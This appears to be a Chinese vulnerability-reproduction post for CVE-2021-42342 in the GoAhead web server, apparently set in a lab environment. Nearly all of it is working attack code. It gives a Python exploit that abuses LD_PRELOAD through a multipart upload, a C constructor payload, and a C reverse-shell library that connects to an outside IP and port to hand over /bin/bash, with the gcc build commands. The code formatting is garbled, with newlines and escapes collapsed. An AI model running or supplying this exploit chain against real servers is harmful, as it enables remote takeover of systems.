【漏洞复现】CVE-2021-42342 GoAhead远程命令执行漏洞

https://github.com/fofapro/vulfocus

gcc -s -shared -fPIC ./payload.c -o payload.so

#include <unistd.h>static void before_main(void) __attribute__((constructor));static void before_main(void){     write(1, "hello: worldrnrn", 16);     write(1, "hackedn", 7); }

import sysimport socketimport sslimport randomfrom urllib.parse import urlparse, ParseResult
PAYLOAD_MAX_LENGTH = 16384 - 200

    def exploit(client, parts: ParseResult, payload: bytes):path = '/' if not parts.path else parts.pathboundary = '----%s' % str(random.randint(1000000000000, 9999999999999))        padding = 'a' * 2000        content_length = min(len(payload) + 500, PAYLOAD_MAX_LENGTH)        data = fr'''POST {path} HTTP/1.1        Host: {parts.hostname}Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Connection: closeContent-Type: multipart/form-data; boundary={boundary}Content-Length: {content_length}
--{boundary}Content-Disposition: form-data; name="LD_PRELOAD";
/proc/self/fd/7--{boundary}Content-Disposition: form-data; name="data"; filename="1.txt"Content-Type: text/plain
#payload#{padding}--{boundary}--'''.replace('n', 'rn')data = data.encode().replace(b'#payload#', payload)client.send(data)resp = client.recv(20480)print(resp.decode())

def main():target = sys.argv[1]payload_filename = sys.argv[2]
with open(payload_filename, 'rb') as f:data = f.read()
if len(data) > PAYLOAD_MAX_LENGTH:raise Exception('payload size must not larger than %d', PAYLOAD_MAX_LENGTH)
parts = urlparse(target)port = parts.portif not parts.port:if parts.scheme == 'https':port = 443else:port = 80
context = ssl.create_default_context()with socket.create_connection((parts.hostname, port), timeout=8) as client:if parts.scheme == 'https':with context.wrap_socket(client, server_hostname=parts.hostname) as ssock:exploit(ssock, parts, data)
else:exploit(client, parts, data)

if __name__ == '__main__':main()

#include<stdio.h>#include<stdlib.h>#include<sys/socket.h>#include<netinet/in.h>
char *server_ip="177.16.2.197";/*The server which accepts shell*/uint32_t server_port=7777;/*The port which you listen to*/static void reverse_shell(void) __attribute__((constructor));static void reverse_shell(void){  int sock = socket(AF_INET, SOCK_STREAM, 0);  struct sockaddr_in attacker_addr = {0};  attacker_addr.sin_family = AF_INET;  attacker_addr.sin_port = htons(server_port);  attacker_addr.sin_addr.s_addr = inet_addr(server_ip);  if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)    exit(0);  dup2(sock, 0);  dup2(sock, 1);  dup2(sock, 2);  execve("/bin/bash", 0, 0);}

gcc -s -shared -fPIC ./shell.c -o shell.so